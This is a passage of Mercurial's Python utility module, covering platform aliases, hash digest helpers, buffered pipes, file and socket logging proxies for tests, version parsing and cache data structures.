             safehasattr = pycompat.safehasattr
             socketserver = pycompat.socketserver
             bytesio = pycompat.bytesio
             # TODO deprecate stringio name, as it is a lie on Python 3.
             stringio = bytesio
             xmlrpclib = pycompat.xmlrpclib
             httpserver = urllibcompat.httpserver
             urlerr = urllibcompat.urlerr
             urlreq = urllibcompat.urlreq
             # workaround for win32mbcs
             _filenamebytestr = pycompat.bytestr
             if pycompat.iswindows:
                 from . import windows as platform
             else:
                 from . import posix as platform
             _ = i18n._
             bindunixsocket = platform.bindunixsocket
             cachestat = platform.cachestat
             checkexec = platform.checkexec
             checklink = platform.checklink
             copymode = platform.copymode
             expandglobs = platform.expandglobs
             getfsmountpoint = platform.getfsmountpoint
             getfstype = platform.getfstype
             groupmembers = platform.groupmembers
             groupname = platform.groupname
             isexec = platform.isexec
             isowner = platform.isowner
             listdir = osutil.listdir
             localpath = platform.localpath
             lookupreg = platform.lookupreg
             makedir = platform.makedir
             nlinks = platform.nlinks
             normpath = platform.normpath
             normcase = platform.normcase
             normcasespec = platform.normcasespec
             normcasefallback = platform.normcasefallback
             openhardlinks = platform.openhardlinks
             oslink = platform.oslink
             parsepatchoutput = platform.parsepatchoutput
             pconvert = platform.pconvert
             poll = platform.poll
             posixfile = platform.posixfile
             rename = platform.rename
             removedirs = platform.removedirs
             samedevice = platform.samedevice
             samefile = platform.samefile
             samestat = platform.samestat
             setflags = platform.setflags
             split = platform.split
             statfiles = getattr(osutil, 'statfiles', platform.statfiles)
             statisexec = platform.statisexec
             statislink = platform.statislink
             umask = platform.umask
             unlink = platform.unlink
             username = platform.username
             try:
                 recvfds = osutil.recvfds
             except AttributeError:
                 pass
             # Python compatibility
             _notset = object()
             def bitsfrom(container):
                 bits = 0
                 for bit in container:
                     bits |= bit
                 return bits
             # python 2.6 still have deprecation warning enabled by default. We do not want
             # to display anything to standard user so detect if we are running test and
             # only use python deprecation warning in this case.
             _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
             if _dowarn:
                 # explicitly unfilter our warning for python 2.7
                 #
                 # The option of setting PYTHONWARNINGS in the test runner was investigated.
                 # However, module name set through PYTHONWARNINGS was exactly matched, so
                 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
                 # makes the whole PYTHONWARNINGS thing useless for our usecase.
                 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
                 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
                 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
             if _dowarn and pycompat.ispy3:
                 # silence warning emitted by passing user string to re.sub()
                 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
                                         r'mercurial')
                 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
                                         DeprecationWarning, r'mercurial')
                 # TODO: reinvent imp.is_frozen()
                 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
                                         DeprecationWarning, r'mercurial')
             def nouideprecwarn(msg, version, stacklevel=1):
                 """Issue an python native deprecation warning
                 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
                 """
                 if _dowarn:
                     msg += ("\n(compatibility will be dropped after Mercurial-%s,"
                             " update your code.)") % version
                     warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
             DIGESTS = {
                 'md5': hashlib.md5,
                 'sha1': hashlib.sha1,
                 'sha512': hashlib.sha512,
             }
             # List of digest types from strongest to weakest
             DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
             for k in DIGESTS_BY_STRENGTH:
                 assert k in DIGESTS
             class digester(object):
                 """helper to compute digests.
                 This helper can be used to compute one or more digests given their name.
                 >>> d = digester([b'md5', b'sha1'])
                 >>> d.update(b'foo')
                 >>> [k for k in sorted(d)]
                 ['md5', 'sha1']
                 >>> d[b'md5']
                 'acbd18db4cc2f85cedef654fccc4a4d8'
                 >>> d[b'sha1']
                 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
                 >>> digester.preferred([b'md5', b'sha1'])
                 'sha1'
                 """
                 def __init__(self, digests, s=''):
                     self._hashes = {}
                     for k in digests:
                         if k not in DIGESTS:
                             raise error.Abort(_('unknown digest type: %s') % k)
                         self._hashes[k] = DIGESTS[k]()
                     if s:
                         self.update(s)
                 def update(self, data):
                     for h in self._hashes.values():
                         h.update(data)
                 def __getitem__(self, key):
                     if key not in DIGESTS:
                         raise error.Abort(_('unknown digest type: %s') % k)
                     return nodemod.hex(self._hashes[key].digest())
                 def __iter__(self):
                     return iter(self._hashes)
                 @staticmethod
                 def preferred(supported):
                     """returns the strongest digest type in both supported and DIGESTS."""
                     for k in DIGESTS_BY_STRENGTH:
                         if k in supported:
                             return k
                     return None
             class digestchecker(object):
                 """file handle wrapper that additionally checks content against a given
                 size and digests.
                     d = digestchecker(fh, size, {'md5': '...'})
                 When multiple digests are given, all of them are validated.
                 """
                 def __init__(self, fh, size, digests):
                     self._fh = fh
                     self._size = size
                     self._got = 0
                     self._digests = dict(digests)
                     self._digester = digester(self._digests.keys())
                 def read(self, length=-1):
                     content = self._fh.read(length)
                     self._digester.update(content)
                     self._got += len(content)
                     return content
                 def validate(self):
                     if self._size != self._got:
                         raise error.Abort(_('size mismatch: expected %d, got %d') %
                                           (self._size, self._got))
                     for k, v in self._digests.items():
                         if v != self._digester[k]:
                             # i18n: first parameter is a digest name
                             raise error.Abort(_('%s mismatch: expected %s, got %s') %
                                               (k, v, self._digester[k]))
             try:
                 buffer = buffer
             except NameError:
                 def buffer(sliceable, offset=0, length=None):
                     if length is not None:
                         return memoryview(sliceable)[offset:offset + length]
                     return memoryview(sliceable)[offset:]
             _chunksize = 4096
             class bufferedinputpipe(object):
                 """a manually buffered input pipe
                 Python will not let us use buffered IO and lazy reading with 'polling' at
                 the same time. We cannot probe the buffer state and select will not detect
                 that data are ready to read if they are already buffered.
                 This class let us work around that by implementing its own buffering
                 (allowing efficient readline) while offering a way to know if the buffer is
                 empty from the output (allowing collaboration of the buffer with polling).
                 This class lives in the 'util' module because it makes use of the 'os'
                 module from the python stdlib.
                 """
                 def __new__(cls, fh):
                     # If we receive a fileobjectproxy, we need to use a variation of this
                     # class that notifies observers about activity.
                     if isinstance(fh, fileobjectproxy):
                         cls = observedbufferedinputpipe
                     return super(bufferedinputpipe, cls).__new__(cls)
                 def __init__(self, input):
                     self._input = input
                     self._buffer = []
                     self._eof = False
                     self._lenbuf = 0
                 @property
                 def hasbuffer(self):
                     """True is any data is currently buffered
                     This will be used externally a pre-step for polling IO. If there is
                     already data then no polling should be set in place."""
                     return bool(self._buffer)
                 @property
                 def closed(self):
                     return self._input.closed
                 def fileno(self):
                     return self._input.fileno()
                 def close(self):
                     return self._input.close()
                 def read(self, size):
                     while (not self._eof) and (self._lenbuf < size):
                         self._fillbuffer()
                     return self._frombuffer(size)
                 def unbufferedread(self, size):
                     if not self._eof and self._lenbuf == 0:
                         self._fillbuffer(max(size, _chunksize))
                     return self._frombuffer(min(self._lenbuf, size))
                 def readline(self, *args, **kwargs):
                     if 1 < len(self._buffer):
                         # this should not happen because both read and readline end with a
                         # _frombuffer call that collapse it.
                         self._buffer = [''.join(self._buffer)]
                         self._lenbuf = len(self._buffer[0])
                     lfi = -1
                     if self._buffer:
                         lfi = self._buffer[-1].find('\n')
                     while (not self._eof) and lfi < 0:
                         self._fillbuffer()
                         if self._buffer:
                             lfi = self._buffer[-1].find('\n')
                     size = lfi + 1
                     if lfi < 0: # end of file
                         size = self._lenbuf
                     elif 1 < len(self._buffer):
                         # we need to take previous chunks into account
                         size += self._lenbuf - len(self._buffer[-1])
                     return self._frombuffer(size)
                 def _frombuffer(self, size):
                     """return at most 'size' data from the buffer
                     The data are removed from the buffer."""
                     if size == 0 or not self._buffer:
                         return ''
                     buf = self._buffer[0]
                     if 1 < len(self._buffer):
                         buf = ''.join(self._buffer)
                     data = buf[:size]
                     buf = buf[len(data):]
                     if buf:
                         self._buffer = [buf]
                         self._lenbuf = len(buf)
                     else:
                         self._buffer = []
                         self._lenbuf = 0
                     return data
                 def _fillbuffer(self, size=_chunksize):
                     """read data to the buffer"""
                     data = os.read(self._input.fileno(), size)
                     if not data:
                         self._eof = True
                     else:
                         self._lenbuf += len(data)
                         self._buffer.append(data)
                     return data
             def mmapread(fp):
                 try:
                     fd = getattr(fp, 'fileno', lambda: fp)()
                     return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
                 except ValueError:
                     # Empty files cannot be mmapped, but mmapread should still work.  Check
                     # if the file is empty, and if so, return an empty buffer.
                     if os.fstat(fd).st_size == 0:
                         return ''
                     raise
             class fileobjectproxy(object):
                 """A proxy around file objects that tells a watcher when events occur.
                 This type is intended to only be used for testing purposes. Think hard
                 before using it in important code.
                 """
                 __slots__ = (
                     r'_orig',
                     r'_observer',
                 )
                 def __init__(self, fh, observer):
                     object.__setattr__(self, r'_orig', fh)
                     object.__setattr__(self, r'_observer', observer)
                 def __getattribute__(self, name):
                     ours = {
                         r'_observer',
                         # IOBase
                         r'close',
                         # closed if a property
                         r'fileno',
                         r'flush',
                         r'isatty',
                         r'readable',
                         r'readline',
                         r'readlines',
                         r'seek',
                         r'seekable',
                         r'tell',
                         r'truncate',
                         r'writable',
                         r'writelines',
                         # RawIOBase
                         r'read',
                         r'readall',
                         r'readinto',
                         r'write',
                         # BufferedIOBase
                         # raw is a property
                         r'detach',
                         # read defined above
                         r'read1',
                         # readinto defined above
                         # write defined above
                     }
                     # We only observe some methods.
                     if name in ours:
                         return object.__getattribute__(self, name)
                     return getattr(object.__getattribute__(self, r'_orig'), name)
                 def __nonzero__(self):
                     return bool(object.__getattribute__(self, r'_orig'))
                 __bool__ = __nonzero__
                 def __delattr__(self, name):
                     return delattr(object.__getattribute__(self, r'_orig'), name)
                 def __setattr__(self, name, value):
                     return setattr(object.__getattribute__(self, r'_orig'), name, value)
                 def __iter__(self):
                     return object.__getattribute__(self, r'_orig').__iter__()
                 def _observedcall(self, name, *args, **kwargs):
                     # Call the original object.
                     orig = object.__getattribute__(self, r'_orig')
                     res = getattr(orig, name)(*args, **kwargs)
                     # Call a method on the observer of the same name with arguments
                     # so it can react, log, etc.
                     observer = object.__getattribute__(self, r'_observer')
                     fn = getattr(observer, name, None)
                     if fn:
                         fn(res, *args, **kwargs)
                     return res
                 def close(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'close', *args, **kwargs)
                 def fileno(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'fileno', *args, **kwargs)
                 def flush(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'flush', *args, **kwargs)
                 def isatty(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'isatty', *args, **kwargs)
                 def readable(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'readable', *args, **kwargs)
                 def readline(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'readline', *args, **kwargs)
                 def readlines(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'readlines', *args, **kwargs)
                 def seek(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'seek', *args, **kwargs)
                 def seekable(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'seekable', *args, **kwargs)
                 def tell(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'tell', *args, **kwargs)
                 def truncate(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'truncate', *args, **kwargs)
                 def writable(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'writable', *args, **kwargs)
                 def writelines(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'writelines', *args, **kwargs)
                 def read(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'read', *args, **kwargs)
                 def readall(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'readall', *args, **kwargs)
                 def readinto(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'readinto', *args, **kwargs)
                 def write(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'write', *args, **kwargs)
                 def detach(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'detach', *args, **kwargs)
                 def read1(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'read1', *args, **kwargs)
             class observedbufferedinputpipe(bufferedinputpipe):
                 """A variation of bufferedinputpipe that is aware of fileobjectproxy.
                 ``bufferedinputpipe`` makes low-level calls to ``os.read()`` that
                 bypass ``fileobjectproxy``. Because of this, we need to make
                 ``bufferedinputpipe`` aware of these operations.
                 This variation of ``bufferedinputpipe`` can notify observers about
                 ``os.read()`` events. It also re-publishes other events, such as
                 ``read()`` and ``readline()``.
                 """
                 def _fillbuffer(self):
                     res = super(observedbufferedinputpipe, self)._fillbuffer()
                     fn = getattr(self._input._observer, r'osread', None)
                     if fn:
                         fn(res, _chunksize)
                     return res
                 # We use different observer methods because the operation isn't
                 # performed on the actual file object but on us.
                 def read(self, size):
                     res = super(observedbufferedinputpipe, self).read(size)
                     fn = getattr(self._input._observer, r'bufferedread', None)
                     if fn:
                         fn(res, size)
                     return res
                 def readline(self, *args, **kwargs):
                     res = super(observedbufferedinputpipe, self).readline(*args, **kwargs)
                     fn = getattr(self._input._observer, r'bufferedreadline', None)
                     if fn:
                         fn(res)
                     return res
             PROXIED_SOCKET_METHODS = {
                 r'makefile',
                 r'recv',
                 r'recvfrom',
                 r'recvfrom_into',
                 r'recv_into',
                 r'send',
                 r'sendall',
                 r'sendto',
                 r'setblocking',
                 r'settimeout',
                 r'gettimeout',
                 r'setsockopt',
             }
             class socketproxy(object):
                 """A proxy around a socket that tells a watcher when events occur.
                 This is like ``fileobjectproxy`` except for sockets.
                 This type is intended to only be used for testing purposes. Think hard
                 before using it in important code.
                 """
                 __slots__ = (
                     r'_orig',
                     r'_observer',
                 )
                 def __init__(self, sock, observer):
                     object.__setattr__(self, r'_orig', sock)
                     object.__setattr__(self, r'_observer', observer)
                 def __getattribute__(self, name):
                     if name in PROXIED_SOCKET_METHODS:
                         return object.__getattribute__(self, name)
                     return getattr(object.__getattribute__(self, r'_orig'), name)
                 def __delattr__(self, name):
                     return delattr(object.__getattribute__(self, r'_orig'), name)
                 def __setattr__(self, name, value):
                     return setattr(object.__getattribute__(self, r'_orig'), name, value)
                 def __nonzero__(self):
                     return bool(object.__getattribute__(self, r'_orig'))
                 __bool__ = __nonzero__
                 def _observedcall(self, name, *args, **kwargs):
                     # Call the original object.
                     orig = object.__getattribute__(self, r'_orig')
                     res = getattr(orig, name)(*args, **kwargs)
                     # Call a method on the observer of the same name with arguments
                     # so it can react, log, etc.
                     observer = object.__getattribute__(self, r'_observer')
                     fn = getattr(observer, name, None)
                     if fn:
                         fn(res, *args, **kwargs)
                     return res
                 def makefile(self, *args, **kwargs):
                     res = object.__getattribute__(self, r'_observedcall')(
                         r'makefile', *args, **kwargs)
                     # The file object may be used for I/O. So we turn it into a
                     # proxy using our observer.
                     observer = object.__getattribute__(self, r'_observer')
                     return makeloggingfileobject(observer.fh, res, observer.name,
                                                  reads=observer.reads,
                                                  writes=observer.writes,
                                                  logdata=observer.logdata,
                                                  logdataapis=observer.logdataapis)
                 def recv(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'recv', *args, **kwargs)
                 def recvfrom(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'recvfrom', *args, **kwargs)
                 def recvfrom_into(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'recvfrom_into', *args, **kwargs)
                 def recv_into(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'recv_info', *args, **kwargs)
                 def send(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'send', *args, **kwargs)
                 def sendall(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'sendall', *args, **kwargs)
                 def sendto(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'sendto', *args, **kwargs)
                 def setblocking(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'setblocking', *args, **kwargs)
                 def settimeout(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'settimeout', *args, **kwargs)
                 def gettimeout(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'gettimeout', *args, **kwargs)
                 def setsockopt(self, *args, **kwargs):
                     return object.__getattribute__(self, r'_observedcall')(
                         r'setsockopt', *args, **kwargs)
             class baseproxyobserver(object):
                 def _writedata(self, data):
                     if not self.logdata:
                         if self.logdataapis:
                             self.fh.write('\n')
                             self.fh.flush()
                         return
                     # Simple case writes all data on a single line.
                     if b'\n' not in data:
                         if self.logdataapis:
                             self.fh.write(': %s\n' % stringutil.escapestr(data))
                         else:
                             self.fh.write('%s>     %s\n'
                                           % (self.name, stringutil.escapestr(data)))
                         self.fh.flush()
                         return
                     # Data with newlines is written to multiple lines.
                     if self.logdataapis:
                         self.fh.write(':\n')
                     lines = data.splitlines(True)
                     for line in lines:
                         self.fh.write('%s>     %s\n'
                                       % (self.name, stringutil.escapestr(line)))
                     self.fh.flush()
             class fileobjectobserver(baseproxyobserver):
                 """Logs file object activity."""
                 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
                              logdataapis=True):
                     self.fh = fh
                     self.name = name
                     self.logdata = logdata
                     self.logdataapis = logdataapis
                     self.reads = reads
                     self.writes = writes
                 def read(self, res, size=-1):
                     if not self.reads:
                         return
                     # Python 3 can return None from reads at EOF instead of empty strings.
                     if res is None:
                         res = ''
                     if size == -1 and res == '':
                         # Suppress pointless read(-1) calls that return
                         # nothing. These happen _a lot_ on Python 3, and there
                         # doesn't seem to be a better workaround to have matching
                         # Python 2 and 3 behavior. :(
                         return
                     if self.logdataapis:
                         self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
                     self._writedata(res)
                 def readline(self, res, limit=-1):
                     if not self.reads:
                         return
                     if self.logdataapis:
                         self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
                     self._writedata(res)
                 def readinto(self, res, dest):
                     if not self.reads:
                         return
                     if self.logdataapis:
                         self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
                                                                   res))
                     data = dest[0:res] if res is not None else b''
                     self._writedata(data)
                 def write(self, res, data):
                     if not self.writes:
                         return
                     # Python 2 returns None from some write() calls. Python 3 (reasonably)
                     # returns the integer bytes written.
                     if res is None and data:
                         res = len(data)
                     if self.logdataapis:
                         self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
                     self._writedata(data)
                 def flush(self, res):
                     if not self.writes:
                         return
                     self.fh.write('%s> flush() -> %r\n' % (self.name, res))
                 # For observedbufferedinputpipe.
                 def bufferedread(self, res, size):
                     if not self.reads:
                         return
                     if self.logdataapis:
                         self.fh.write('%s> bufferedread(%d) -> %d' % (
                             self.name, size, len(res)))
                     self._writedata(res)
                 def bufferedreadline(self, res):
                     if not self.reads:
                         return
                     if self.logdataapis:
                         self.fh.write('%s> bufferedreadline() -> %d' % (
                             self.name, len(res)))
                     self._writedata(res)
             def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
                                       logdata=False, logdataapis=True):
                 """Turn a file object into a logging file object."""
                 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
                                               logdata=logdata, logdataapis=logdataapis)
                 return fileobjectproxy(fh, observer)
             class socketobserver(baseproxyobserver):
                 """Logs socket activity."""
                 def __init__(self, fh, name, reads=True, writes=True, states=True,
                              logdata=False, logdataapis=True):
                     self.fh = fh
                     self.name = name
                     self.reads = reads
                     self.writes = writes
                     self.states = states
                     self.logdata = logdata
                     self.logdataapis = logdataapis
                 def makefile(self, res, mode=None, bufsize=None):
                     if not self.states:
                         return
                     self.fh.write('%s> makefile(%r, %r)\n' % (
                         self.name, mode, bufsize))
                 def recv(self, res, size, flags=0):
                     if not self.reads:
                         return
                     if self.logdataapis:
                         self.fh.write('%s> recv(%d, %d) -> %d' % (
                             self.name, size, flags, len(res)))
                     self._writedata(res)
                 def recvfrom(self, res, size, flags=0):
                     if not self.reads:
                         return
                     if self.logdataapis:
                         self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
                             self.name, size, flags, len(res[0])))
                     self._writedata(res[0])
                 def recvfrom_into(self, res, buf, size, flags=0):
                     if not self.reads:
                         return
                     if self.logdataapis:
                         self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
                             self.name, size, flags, res[0]))
                     self._writedata(buf[0:res[0]])
                 def recv_into(self, res, buf, size=0, flags=0):
                     if not self.reads:
                         return
                     if self.logdataapis:
                         self.fh.write('%s> recv_into(%d, %d) -> %d' % (
                             self.name, size, flags, res))
                     self._writedata(buf[0:res])
                 def send(self, res, data, flags=0):
                     if not self.writes:
                         return
                     self.fh.write('%s> send(%d, %d) -> %d' % (
                         self.name, len(data), flags, len(res)))
                     self._writedata(data)
                 def sendall(self, res, data, flags=0):
                     if not self.writes:
                         return
                     if self.logdataapis:
                         # Returns None on success. So don't bother reporting return value.
                         self.fh.write('%s> sendall(%d, %d)' % (
                             self.name, len(data), flags))
                     self._writedata(data)
                 def sendto(self, res, data, flagsoraddress, address=None):
                     if not self.writes:
                         return
                     if address:
                         flags = flagsoraddress
                     else:
                         flags = 0
                     if self.logdataapis:
                         self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
                             self.name, len(data), flags, address, res))
                     self._writedata(data)
                 def setblocking(self, res, flag):
                     if not self.states:
                         return
                     self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
                 def settimeout(self, res, value):
                     if not self.states:
                         return
                     self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
                 def gettimeout(self, res):
                     if not self.states:
                         return
                     self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
                 def setsockopt(self, res, level, optname, value):
                     if not self.states:
                         return
                     self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
                         self.name, level, optname, value, res))
             def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
                                   logdata=False, logdataapis=True):
                 """Turn a socket into a logging socket."""
                 observer = socketobserver(logh, name, reads=reads, writes=writes,
                                           states=states, logdata=logdata,
                                           logdataapis=logdataapis)
                 return socketproxy(fh, observer)
             def version():
                 """Return version information if available."""
                 try:
                     from . import __version__
                     return __version__.version
                 except ImportError:
                     return 'unknown'
             def versiontuple(v=None, n=4):
                 """Parses a Mercurial version string into an N-tuple.
                 The version string to be parsed is specified with the ``v`` argument.
                 If it isn't defined, the current Mercurial version string will be parsed.
                 ``n`` can be 2, 3, or 4. Here is how some version strings map to
                 returned values:
                 >>> v = b'3.6.1+190-df9b73d2d444'
                 >>> versiontuple(v, 2)
                 (3, 6)
                 >>> versiontuple(v, 3)
                 (3, 6, 1)
                 >>> versiontuple(v, 4)
                 (3, 6, 1, '190-df9b73d2d444')
                 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
                 (3, 6, 1, '190-df9b73d2d444+20151118')
                 >>> v = b'3.6'
                 >>> versiontuple(v, 2)
                 (3, 6)
                 >>> versiontuple(v, 3)
                 (3, 6, None)
                 >>> versiontuple(v, 4)
                 (3, 6, None, None)
                 >>> v = b'3.9-rc'
                 >>> versiontuple(v, 2)
                 (3, 9)
                 >>> versiontuple(v, 3)
                 (3, 9, None)
                 >>> versiontuple(v, 4)
                 (3, 9, None, 'rc')
                 >>> v = b'3.9-rc+2-02a8fea4289b'
                 >>> versiontuple(v, 2)
                 (3, 9)
                 >>> versiontuple(v, 3)
                 (3, 9, None)
                 >>> versiontuple(v, 4)
                 (3, 9, None, 'rc+2-02a8fea4289b')
                 >>> versiontuple(b'4.6rc0')
                 (4, 6, None, 'rc0')
                 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
                 (4, 6, None, 'rc0+12-425d55e54f98')
                 >>> versiontuple(b'.1.2.3')
                 (None, None, None, '.1.2.3')
                 >>> versiontuple(b'12.34..5')
                 (12, 34, None, '..5')
                 >>> versiontuple(b'1.2.3.4.5.6')
                 (1, 2, 3, '.4.5.6')
                 """
                 if not v:
                     v = version()
                 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
                 if not m:
                     vparts, extra = '', v
                 elif m.group(2):
                     vparts, extra = m.groups()
                 else:
                     vparts, extra = m.group(1), None
                 vints = []
                 for i in vparts.split('.'):
                     try:
                         vints.append(int(i))
                     except ValueError:
                         break
                 # (3, 6) -> (3, 6, None)
                 while len(vints) < 3:
                     vints.append(None)
                 if n == 2:
                     return (vints[0], vints[1])
                 if n == 3:
                     return (vints[0], vints[1], vints[2])
                 if n == 4:
                     return (vints[0], vints[1], vints[2], extra)
             def cachefunc(func):
                 '''cache the result of function calls'''
                 # XXX doesn't handle keywords args
                 if func.__code__.co_argcount == 0:
                     cache = []
                     def f():
                         if len(cache) == 0:
                             cache.append(func())
                         return cache[0]
                     return f
                 cache = {}
                 if func.__code__.co_argcount == 1:
                     # we gain a small amount of time because
                     # we don't need to pack/unpack the list
                     def f(arg):
                         if arg not in cache:
                             cache[arg] = func(arg)
                         return cache[arg]
                 else:
                     def f(*args):
                         if args not in cache:
                             cache[args] = func(*args)
                         return cache[args]
                 return f
             class cow(object):
                 """helper class to make copy-on-write easier
                 Call preparewrite before doing any writes.
                 """
                 def preparewrite(self):
                     """call this before writes, return self or a copied new object"""
                     if getattr(self, '_copied', 0):
                         self._copied -= 1
                         return self.__class__(self)
                     return self
                 def copy(self):
                     """always do a cheap copy"""
                     self._copied = getattr(self, '_copied', 0) + 1
                     return self
             class sortdict(collections.OrderedDict):
                 '''a simple sorted dictionary
                 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
                 >>> d2 = d1.copy()
                 >>> d2
                 sortdict([('a', 0), ('b', 1)])
                 >>> d2.update([(b'a', 2)])
                 >>> list(d2.keys()) # should still be in last-set order
                 ['b', 'a']
                 '''
                 def __setitem__(self, key, value):
                     if key in self:
                         del self[key]
                     super(sortdict, self).__setitem__(key, value)
                 if pycompat.ispypy:
                     # __setitem__() isn't called as of PyPy 5.8.0
                     def update(self, src):
                         if isinstance(src, dict):
                             src = src.iteritems()
                         for k, v in src:
                             self[k] = v
             class cowdict(cow, dict):
                 """copy-on-write dict
                 Be sure to call d = d.preparewrite() before writing to d.
                 >>> a = cowdict()
                 >>> a is a.preparewrite()
                 True
                 >>> b = a.copy()
                 >>> b is a
                 True
                 >>> c = b.copy()
                 >>> c is a
                 True
                 >>> a = a.preparewrite()
                 >>> b is a
                 False
                 >>> a is a.preparewrite()
                 True
                 >>> c = c.preparewrite()
                 >>> b is c
                 False
                 >>> b is b.preparewrite()
                 True
                 """
             class cowsortdict(cow, sortdict):
                 """copy-on-write sortdict
                 Be sure to call d = d.preparewrite() before writing to d.
                 """
             class transactional(object):
                 """Base class for making a transactional type into a context manager."""
                 __metaclass__ = abc.ABCMeta
                 @abc.abstractmethod
                 def close(self):
                     """Successfully closes the transaction."""
                 @abc.abstractmethod
                 def release(self):
                     """Marks the end of the transaction.
                     If the transaction has not been closed, it will be aborted.
                     """
                 def __enter__(self):
                     return self
                 def __exit__(self, exc_type, exc_val, exc_tb):
                     try:
                         if exc_type is None:
                             self.close()
                     finally:
                         self.release()
             @contextlib.contextmanager
             def acceptintervention(tr=None):
                 """A context manager that closes the transaction on InterventionRequired
                 If no transaction was provided, this simply runs the body and returns
                 """
                 if not tr:
                     yield
                     return
                 try:
                     yield
                     tr.close()
                 except error.InterventionRequired:
                     tr.close()
                     raise
                 finally:
                     tr.release()
             @contextlib.contextmanager
             def nullcontextmanager():
                 yield
             class _lrucachenode(object):
                 """A node in a doubly linked list.
                 Holds a reference to nodes on either side as well as a key-value
                 pair for the dictionary entry.
                 """
                 __slots__ = (u'next', u'prev', u'key', u'value')
                 def __init__(self):
                     self.next = None
                     self.prev = None
                     self.key = _notset
                     self.value = None
                 def markempty(self):
                     """Mark the node as emptied."""
                     self.key = _notset
             class lrucachedict(object):
                 """Dict that caches most recent accesses and sets.
                 The dict consists of an actual backing dict - indexed by original
                 key - and a doubly linked circular list defining the order of entries in
                 the cache.
                 The head node is the newest entry in the cache. If the cache is full,
                 we recycle head.prev and make it the new head. Cache accesses result in
                 the node being moved to before the existing head and being marked as the
                 new head node.
                 """
                 def __init__(self, max):
                     self._cache = {}
                     self._head = head = _lrucachenode()
                     head.prev = head
                     head.next = head
                     self._size = 1
                     self.capacity = max
                 def __len__(self):
                     return len(self._cache)
                 def __contains__(self, k):
                     return k in self._cache
                 def __iter__(self):
                     # We don't have to iterate in cache order, but why not.
                     n = self._head
                     for i in range(len(self._cache)):
                         yield n.key
                         n = n.next
                 def __getitem__(self, k):
                     node = self._cache[k]
                     self._movetohead(node)
                     return node.value
                 def __setitem__(self, k, v):
                     node = self._cache.get(k)
                     # Replace existing value and mark as newest.
                     if node is not None:
                         node.value = v
                         self._movetohead(node)
                         return
                     if self._size < self.capacity:
                         node = self._addcapacity()
                     else:
                         # Grab the last/oldest item.
                         node = self._head.prev
                     # At capacity. Kill the old entry.
                     if node.key is not _notset:
                         del self._cache[node.key]
                     node.key = k
                     node.value = v
                     self._cache[k] = node
                     # And mark it as newest entry. No need to adjust order since it
                     # is already self._head.prev.
                     self._head = node
                 def __delitem__(self, k):
                     node = self._cache.pop(k)
                     node.markempty()
                     # Temporarily mark as newest item before re-adjusting head to make
                     # this node the oldest item.
